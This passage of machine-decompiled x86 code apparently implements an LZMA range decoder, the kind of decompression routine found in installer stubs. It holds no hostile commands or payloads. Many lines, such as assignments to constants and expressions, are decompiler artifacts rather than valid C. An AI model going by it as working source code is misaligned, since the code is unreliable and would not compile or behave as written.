                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                      													L132:
                                      													 *(_t621 - 0x54) = _t614;
                                      													goto L133;
                                      												}
                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      												__esi =  *(__ebp - 0x60);
                                      												__cl = 8;
                                      												__cl = 8 -  *(__ebp - 0x3c);
                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      												__ecx =  *(__ebp - 0x3c);
                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      												__ecx =  *(__ebp - 4);
                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      												__eflags =  *(__ebp - 0x38) - 4;
                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      												if( *(__ebp - 0x38) >= 4) {
                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                      													if( *(__ebp - 0x38) >= 0xa) {
                                      														_t98 = __ebp - 0x38;
                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                      														__eflags =  *_t98;
                                      													} else {
                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      													}
                                      												} else {
                                      													 *(__ebp - 0x38) = 0;
                                      												}
                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                      												if( *(__ebp - 0x34) == __edx) {
                                      													__ebx = 0;
                                      													__ebx = 1;
                                      													goto L61;
                                      												} else {
                                      													__eax =  *(__ebp - 0x14);
                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      													__eflags = __eax -  *(__ebp - 0x74);
                                      													if(__eax >=  *(__ebp - 0x74)) {
                                      														__eax = __eax +  *(__ebp - 0x74);
                                      														__eflags = __eax;
                                      													}
                                      													__ecx =  *(__ebp - 8);
                                      													__ebx = 0;
                                      													__ebx = 1;
                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      													goto L41;
                                      												}
                                      											case 7:
                                      												goto L0;
                                      											case 8:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 4);
                                      													__ecx =  *(__ebp - 0x38);
                                      													 *(__ebp - 0x84) = 0xa;
                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                      												} else {
                                      													__eax =  *(__ebp - 0x38);
                                      													__ecx =  *(__ebp - 4);
                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                      													 *(__ebp - 0x84) = 9;
                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                      												}
                                      												while(1) {
                                      													L132:
                                      													 *(_t621 - 0x54) = _t614;
                                      													goto L133;
                                      												}
                                      											case 9:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													goto L89;
                                      												}
                                      												__eflags =  *(__ebp - 0x60);
                                      												if( *(__ebp - 0x60) == 0) {
                                      													goto L171;
                                      												}
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                      												__eflags = _t258;
                                      												0 | _t258 = _t258 + _t258 + 9;
                                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                      												goto L75;
                                      											case 0xa:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 4);
                                      													__ecx =  *(__ebp - 0x38);
                                      													 *(__ebp - 0x84) = 0xb;
                                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                      													while(1) {
                                      														L132:
                                      														 *(_t621 - 0x54) = _t614;
                                      														goto L133;
                                      													}
                                      												}
                                      												__eax =  *(__ebp - 0x28);
                                      												goto L88;
                                      											case 0xb:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__ecx =  *(__ebp - 0x24);
                                      													__eax =  *(__ebp - 0x20);
                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      												} else {
                                      													__eax =  *(__ebp - 0x24);
                                      												}
                                      												__ecx =  *(__ebp - 0x28);
                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      												L88:
                                      												__ecx =  *(__ebp - 0x2c);
                                      												 *(__ebp - 0x2c) = __eax;
                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      												L89:
                                      												__eax =  *(__ebp - 4);
                                      												 *(__ebp - 0x80) = 0x15;
                                      												__eax =  *(__ebp - 4) + 0xa68;
                                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                      												goto L68;
                                      											case 0xc:
                                      												L99:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xc;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t334 = __ebp - 0x70;
                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t334;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												__eax =  *(__ebp - 0x2c);
                                      												goto L101;
                                      											case 0xd:
                                      												L37:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xd;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t122 = __ebp - 0x70;
                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t122;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												L39:
                                      												__eax =  *(__ebp - 0x40);
                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      													goto L48;
                                      												}
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													goto L54;
                                      												}
                                      												L41:
                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      												__ecx =  *(__ebp - 0x58);
                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      												 *(__ebp - 0x48) = __eax;
                                      												__eax = __eax + 1;
                                      												__eax = __eax << 8;
                                      												__eax = __eax + __ebx;
                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edx = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													 *(__ebp - 0x40) = 1;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													__ebx = __ebx + __ebx + 1;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edx;
                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													goto L39;
                                      												} else {
                                      													goto L37;
                                      												}
                                      											case 0xe:
                                      												L46:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xe;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t156 = __ebp - 0x70;
                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t156;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												while(1) {
                                      													L48:
                                      													__eflags = __ebx - 0x100;
                                      													if(__ebx >= 0x100) {
                                      														break;
                                      													}
                                      													__eax =  *(__ebp - 0x58);
                                      													__edx = __ebx + __ebx;
                                      													__ecx =  *(__ebp - 0x10);
                                      													__esi = __edx + __eax;
                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                      													__ax =  *__esi;
                                      													 *(__ebp - 0x54) = __esi;
                                      													__edi = __ax & 0x0000ffff;
                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                      													if( *(__ebp - 0xc) >= __ecx) {
                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      														__cx = __ax;
                                      														_t170 = __edx + 1; // 0x1
                                      														__ebx = _t170;
                                      														__cx = __ax >> 5;
                                      														__eflags = __eax;
                                      														 *__esi = __ax;
                                      													} else {
                                      														 *(__ebp - 0x10) = __ecx;
                                      														0x800 = 0x800 - __edi;
                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      														__ebx = __ebx + __ebx;
                                      														 *__esi = __cx;
                                      													}
                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      													 *(__ebp - 0x44) = __ebx;
                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                      														continue;
                                      													} else {
                                      														goto L46;
                                      													}
                                      												}
                                      												L54:
                                      												_t173 = __ebp - 0x34;
                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                      												__eflags =  *_t173;
                                      												goto L55;
                                      											case 0xf:
                                      												L58:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xf;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t203 = __ebp - 0x70;
                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t203;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												L60:
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													L55:
                                      													__al =  *(__ebp - 0x44);
                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      													goto L56;
                                      												}
                                      												L61:
                                      												__eax =  *(__ebp - 0x58);
                                      												__edx = __ebx + __ebx;
                                      												__ecx =  *(__ebp - 0x10);
                                      												__esi = __edx + __eax;
                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													_t217 = __edx + 1; // 0x1
                                      													__ebx = _t217;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													goto L60;
                                      												} else {
                                      													goto L58;
                                      												}
                                      											case 0x10:
                                      												L109:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0x10;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t365 = __ebp - 0x70;
                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t365;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												goto L111;
                                      											case 0x11:
                                      												L68:
                                      												_t614 =  *(_t621 - 0x58);
                                      												 *(_t621 - 0x84) = 0x12;
                                      												while(1) {
                                      													L132:
                                      													 *(_t621 - 0x54) = _t614;
                                      													goto L133;
                                      												}
                                      											case 0x12:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 0x58);
                                      													 *(__ebp - 0x84) = 0x13;
                                      													__esi =  *(__ebp - 0x58) + 2;
                                      													while(1) {
                                      														L132:
                                      														 *(_t621 - 0x54) = _t614;
                                      														goto L133;
                                      													}
                                      												}
                                      												__eax =  *(__ebp - 0x4c);
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      												__ecx =  *(__ebp - 0x58);
                                      												__eax =  *(__ebp - 0x4c) << 4;
                                      												__eflags = __eax;
                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                      												goto L130;
                                      											case 0x13:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													_t469 = __ebp - 0x58;
                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      													__eflags =  *_t469;
                                      													 *(__ebp - 0x30) = 0x10;
                                      													 *(__ebp - 0x40) = 8;
                                      													L144:
                                      													 *(__ebp - 0x7c) = 0x14;
                                      													goto L145;
                                      												}
                                      												__eax =  *(__ebp - 0x4c);
                                      												__ecx =  *(__ebp - 0x58);
                                      												__eax =  *(__ebp - 0x4c) << 4;
                                      												 *(__ebp - 0x30) = 8;
                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      												L130:
                                      												 *(__ebp - 0x58) = __eax;
                                      												 *(__ebp - 0x40) = 3;
                                      												goto L144;
                                      											case 0x14:
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      												__eax =  *(__ebp - 0x80);
                                      												 *(_t621 - 0x88) = _t542;
                                      												goto L1;
                                      											case 0x15:
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      												__al = __al & 0x000000fd;
                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      												goto L120;
                                      											case 0x16:
                                      												__eax =  *(__ebp - 0x30);
                                      												__eflags = __eax - 4;
                                      												if(__eax >= 4) {
                                      													_push(3);
                                      													_pop(__eax);
                                      												}
                                      												__ecx =  *(__ebp - 4);
                                      												 *(__ebp - 0x40) = 6;
                                      												__eax = __eax << 7;
                                      												 *(__ebp - 0x7c) = 0x19;
                                      												 *(__ebp - 0x58) = __eax;
                                      												goto L145;
                                      											case 0x17:
                                      												L145:
                                      												__eax =  *(__ebp - 0x40);
                                      												 *(__ebp - 0x50) = 1;
                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                      												goto L149;
                                      											case 0x18:
                                      												L146:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0x18;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t484 = __ebp - 0x70;
                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t484;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												L148:
                                      												_t487 = __ebp - 0x48;
                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                      												__eflags =  *_t487;
                                      												L149:
                                      												__eflags =  *(__ebp - 0x48);
                                      												if( *(__ebp - 0x48) <= 0) {
                                      													__ecx =  *(__ebp - 0x40);
                                      													__ebx =  *(__ebp - 0x50);
                                      													0 = 1;
                                      													__eax = 1 << __cl;
                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                      													__eax =  *(__ebp - 0x7c);
                                      													 *(__ebp - 0x44) = __ebx;
                                      													while(1) {
                                      														 *(_t621 - 0x88) = _t542;
                                      														goto L1;
                                      													}
                                      												}
                                      												__eax =  *(__ebp - 0x50);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      												__eax =  *(__ebp - 0x58);
                                      												__esi = __edx + __eax;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__ax =  *__esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													__cx = __ax >> 5;
                                      													__eax = __eax - __ecx;
                                      													__edx = __edx + 1;
                                      													__eflags = __edx;
                                      													 *__esi = __ax;
                                      													 *(__ebp - 0x50) = __edx;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													goto L148;
                                      												} else {
                                      													goto L146;
                                      												}
                                      											case 0x19:
                                      												__eflags = __ebx - 4;
                                      												if(__ebx < 4) {
                                      													 *(__ebp - 0x2c) = __ebx;
                                      													L119:
                                      													_t393 = __ebp - 0x2c;
                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                      													__eflags =  *_t393;
                                      													L120:
                                      													__eax =  *(__ebp - 0x2c);
                                      													__eflags = __eax;
                                      													if(__eax == 0) {
                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                      														goto L170;
                                      													}
                                      													__eflags = __eax -  *(__ebp - 0x60);
                                      													if(__eax >  *(__ebp - 0x60)) {
                                      														goto L171;
                                      													}
                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                      													__eax =  *(__ebp - 0x30);
                                      													_t400 = __ebp - 0x60;
                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                      													__eflags =  *_t400;
                                      													goto L123;
                                      												}
                                      												__ecx = __ebx;
                                      												__eax = __ebx;
                                      												__ecx = __ebx >> 1;
                                      												__eax = __ebx & 0x00000001;
                                      												__ecx = (__ebx >> 1) - 1;
                                      												__al = __al | 0x00000002;
                                      												__eax = (__ebx & 0x00000001) << __cl;
                                      												__eflags = __ebx - 0xe;
                                      												 *(__ebp - 0x2c) = __eax;
                                      												if(__ebx >= 0xe) {
                                      													__ebx = 0;
                                      													 *(__ebp - 0x48) = __ecx;
                                      													L102:
                                      													__eflags =  *(__ebp - 0x48);
                                      													if( *(__ebp - 0x48) <= 0) {
                                      														__eax = __eax + __ebx;
                                      														 *(__ebp - 0x40) = 4;
                                      														 *(__ebp - 0x2c) = __eax;
                                      														__eax =  *(__ebp - 4);
                                      														__eax =  *(__ebp - 4) + 0x644;
                                      														__eflags = __eax;
                                      														L108:
                                      														__ebx = 0;
                                      														 *(__ebp - 0x58) = __eax;
                                      														 *(__ebp - 0x50) = 1;
                                      														 *(__ebp - 0x44) = 0;
                                      														 *(__ebp - 0x48) = 0;
                                      														L112:
                                      														__eax =  *(__ebp - 0x40);
                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                      															_t391 = __ebp - 0x2c;
                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                      															__eflags =  *_t391;
                                      															goto L119;
                                      														}
                                      														__eax =  *(__ebp - 0x50);
                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      														__eax =  *(__ebp - 0x58);
                                      														__esi = __edi + __eax;
                                      														 *(__ebp - 0x54) = __esi;
                                      														__ax =  *__esi;
                                      														__ecx = __ax & 0x0000ffff;
                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                      														if( *(__ebp - 0xc) >= __edx) {
                                      															__ecx = 0;
                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                      															__ecx = 1;
                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                      															__ebx = 1;
                                      															__ecx =  *(__ebp - 0x48);
                                      															__ebx = 1 << __cl;
                                      															__ecx = 1 << __cl;
                                      															__ebx =  *(__ebp - 0x44);
                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                      															__cx = __ax;
                                      															__cx = __ax >> 5;
                                      															__eax = __eax - __ecx;
                                      															__edi = __edi + 1;
                                      															__eflags = __edi;
                                      															 *(__ebp - 0x44) = __ebx;
                                      															 *__esi = __ax;
                                      															 *(__ebp - 0x50) = __edi;
                                      														} else {
                                      															 *(__ebp - 0x10) = __edx;
                                      															0x800 = 0x800 - __ecx;
                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      															 *__esi = __dx;
                                      														}
                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                      															L111:
                                      															_t368 = __ebp - 0x48;
                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                      															__eflags =  *_t368;
                                      															goto L112;
                                      														} else {
                                      															goto L109;
                                      														}
                                      													}
                                      													__ecx =  *(__ebp - 0xc);
                                      													__ebx = __ebx + __ebx;
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      													 *(__ebp - 0x44) = __ebx;
                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                      														__ecx =  *(__ebp - 0x10);
                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      														__ebx = __ebx | 0x00000001;
                                      														__eflags = __ebx;
                                      														 *(__ebp - 0x44) = __ebx;
                                      													}
                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                      														L101:
                                      														_t338 = __ebp - 0x48;
                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                      														__eflags =  *_t338;
                                      														goto L102;
                                      													} else {
                                      														goto L99;
                                      													}
                                      												}
                                      												__edx =  *(__ebp - 4);
                                      												__eax = __eax - __ebx;
                                      												 *(__ebp - 0x40) = __ecx;
                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                      												goto L108;
                                      											case 0x1a:
                                      												L56:
                                      												__eflags =  *(__ebp - 0x64);
                                      												if( *(__ebp - 0x64) == 0) {
                                      													 *(__ebp - 0x88) = 0x1a;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x68);
                                      												__al =  *(__ebp - 0x5c);
                                      												__edx =  *(__ebp - 8);
                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      												 *( *(__ebp - 0x68)) = __al;
                                      												__ecx =  *(__ebp - 0x14);
                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                      												__eax = __ecx + 1;
                                      												__edx = 0;
                                      												_t192 = __eax %  *(__ebp - 0x74);
                                      												__eax = __eax /  *(__ebp - 0x74);
                                      												__edx = _t192;
                                      												goto L79;
                                      											case 0x1b:
                                      												L75:
                                      												__eflags =  *(__ebp - 0x64);
                                      												if( *(__ebp - 0x64) == 0) {
                                      													 *(__ebp - 0x88) = 0x1b;
                                      													goto L170;
                                      												}
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__edx =  *(__ebp - 8);
                                      												__cl =  *(__eax + __edx);
                                      												__eax =  *(__ebp - 0x14);
                                      												 *(__ebp - 0x5c) = __cl;
                                      												 *(__eax + __edx) = __cl;
                                      												__eax = __eax + 1;
                                      												__edx = 0;
                                      												_t274 = __eax %  *(__ebp - 0x74);
                                      												__eax = __eax /  *(__ebp - 0x74);
                                      												__edx = _t274;
